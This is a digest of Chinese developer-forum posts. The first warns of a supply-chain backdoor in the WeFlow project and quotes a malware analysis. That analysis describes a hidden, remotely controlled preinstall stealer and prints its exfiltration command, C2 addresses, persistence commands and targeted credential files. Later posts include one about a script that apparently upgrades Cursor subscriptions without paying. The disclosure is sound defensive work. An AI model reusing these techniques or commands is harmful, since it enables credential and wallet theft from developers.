标题: 大家用ai看一下自己的项目别被投毒了
作者: #cong yin
板块: #开发调优
编号: 1834833
帖子: https://linux.do/t/topic/1834833
时间: 2026-03-27 14:04:58
摘要:

这个项目被人提交cr有个preinstall.sh，里面会窃取密钥啥的

  

      github.com/hicccc77/WeFlow
  

  
    
  
   
  

  
    
      preinstall存在后门
    

    
      
        已打开 07:53PM - 26 Mar 26 UTC
      


      
        
          
          jstar0
        
      
    

    
        
          type: bug
        
        
          priority: critical
        
    
  


  
    preinstall.js:1 先用 Unicode variation selector 隐藏字节，再 eval(...) 执行第一层。
第一层会再做一层 A…ES-256-CBC 解密，然后继续 eval。
第二层不会安装 npm 包；它会去多个 Solana RPC 拉取地址 BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC 的最新 memo，把 memo 里的 base64 链接解出来，再按当前 OS 去请求远端 payload。
我实际取到的当前链接是 http://217.69.2.135/NrIgZ6I%2BFyCxXHb%2B9FapRg%3D%3D。其中：
linux 当前返回的是空函数 (() => "")，即目前没下发 Linux 载荷；
darwin 返回约 3.47 MB 的载荷；
win32 返回约 0.55 MB 的载荷。
这意味着它是“远程可变”的恶意安装器：今天拉什么，取决于链上 memo 和服务器返回，不是固定依赖安装。
当前下发的恶意载荷内容

macOS 载荷：我解密后的最终脚本显示，它会窃取 login.keychain-db、Safari/Chrome/Brave/Edge/Firefox 的 Cookies / Login Data / logins.json / key4.db、.ssh、.aws、Apple Notes、本地钱包目录，并打包上传；相关证据可见解密结果里出现的 Library/Keychains/login.keychain-db、Cookies.binarycookies、Login Data、MetaMask、Exodus、Ledger、Trezor、curl -X POST ... http://208.85.20.124/p2p、~/Library/LaunchAgents/com.user.nodestart.plist 等行为。
Windows 载荷：我解密后的最终脚本会创建计划任务和 Run 注册表持久化，隐藏执行 PowerShell，收集浏览器/钱包/VS Code/GitHub 相关数据，压缩后 POST 外发；证据包括 schtasks /create /tn "UpdateApp"、powershell -WindowStyle Hidden、MetaMask、Exodus、Electrum、Login Data、Cookies、http://217.69.3.152:80/log 等。
这已经不是“有风险”，而是典型 信息窃取器 / downloader / persistence 链。

标题: 招行万事达，第一次申请甲骨文就通过
作者: #hanjx
板块: #搞七捻三
编号: 1834835
帖子: https://linux.do/t/topic/1834835
时间: 2026-03-27 14:05:08
摘要:

今天上午去办理了万事达，下午申请就通过了。
因为学生身份无法办理visa全币卡，在招行工作人员帮助下办理的万事达普卡(金葵花要五十万门槛)，耗时20分钟。
具体申请流程就是关闭代理，使用google无痕浏览登录甲骨文注册，邮箱是@gmail.com，开的是北美凤凰城地区，地址都用中文填写，备用名也就是需要拼音的名字按照名在前，姓在后的习惯写的，其他都如实用中文填写，手机号也是国内手机号，然后就通过啦。(看到这个跑道图出来的时候都感觉这就没啦?)
和其他甲骨文注册教程里不一样，我填地址时候并没有按照办卡时填写的地址写，办卡时用的是家庭地址，填甲骨文的时候是工作地址，且都是中文填写。确实比较玄学。

标题: 天才程序员陨落！！！！ 挽救team！！！
作者: #sevensw
板块: #搞七捻三
编号: 1834846
帖子: https://linux.do/t/topic/1834846
时间: 2026-03-27 14:06:45
摘要:

天才程序员要陨落了。 目前还有什么卡头可以开team，请各位大佬集思广益，并分享一下渠道

标题: 关于cursor ultra
作者: #ares.andy
板块: #开发调优
编号: 1834855
帖子: https://linux.do/t/topic/1834855
时间: 2026-03-27 14:08:06
摘要:

用之前的办法，先开通pro，然后执行脚本升级到ultra，目前看好像还能用。这cursor会把多余的账单，秋后算帐吗

标题: alphaXiv上模型数量减少
作者: #LiuJiXin
板块: #开发调优
编号: 1834869
帖子: https://linux.do/t/topic/1834869
时间: 2026-03-27 14:09:35
摘要:

刚准备开始看今天的论文，结果发现claude sonnet4.6没了，gemini 3.1pro也没了。啥情况啊，谁逆向alphaXiv了吗？我读个论文容易吗

标题: team的子号现在会陨落吗？另外查看子号邮件意外发现大善人给我开源项目的审批通过了
作者: #liuyd
板块: #搞七捻三
编号: 1834872
帖子: https://linux.do/t/topic/1834872
时间: 2026-03-27 14:09:55
摘要:

标题: 如今Team 拉闸，订阅plus 来使用codex跟Team额度差的多吗？
作者: #jasonli
板块: #搞七捻三
编号: 1834874
帖子: https://linux.do/t/topic/1834874
时间: 2026-03-27 14:10:21
摘要:

在网上查询一圈，各执其词，最终搜到这个比较明确的结果 不知道准不准，有没有订阅plus佬友对比过team和plus的额度差距，要是相差不大就订阅plus了，要是几乎没几次 还得另寻他法了。

标题: Claude Code 2.1.8x版本Token消耗多的问题是真的吗？
作者: #leilei0628
板块: #开发调优
编号: 1834879
帖子: https://linux.do/t/topic/1834879
时间: 2026-03-27 14:10:46
摘要:

听说Claude Code 2.1.81版本存在缓存创建异常问题导致上下文无法命中，Token消耗多几倍，各位佬知不知道这个是不是真的？

标题: team车是否已经全部拉闸？
作者: #羊羊羊🐑
板块: #前沿快讯
编号: 1834880
帖子: https://linux.do/t/topic/1834880
时间: 2026-03-27 14:11:13
摘要:

openai gpt的team车 是不是全部都拉闸了 家人们 出来聊聊

标题: 公司访问L站这样了
作者: #yomi
板块: #搞七捻三
编号: 1834890
帖子: https://linux.do/t/topic/1834890
时间: 2026-03-27 14:12:17
摘要:

咋回事 有人遇到吗

标题: 午睡起来天塌了～，美区订阅的claude 5x被 封了
作者: #shufu.yes
板块: #搞七捻三
编号: 1834905
帖子: https://linux.do/t/topic/1834905
时间: 2026-03-27 14:13:53
摘要:

3月9号美区付费的claude max 5x今天被封了，用了接近20天，睡觉前还让他帮我写个程序，没想到美美的午觉后，一坐在电脑前，收到龙虾的 LLM request rejected: This organization has been disabled. ，真是不知道要怎么给claude送钱好了， 心累

标题: 帮我看看女神给我发了这个是啥意思
作者: #smzd
板块: #搞七捻三
编号: 1834910
帖子: https://linux.do/t/topic/1834910
时间: 2026-03-27 14:14:25
摘要: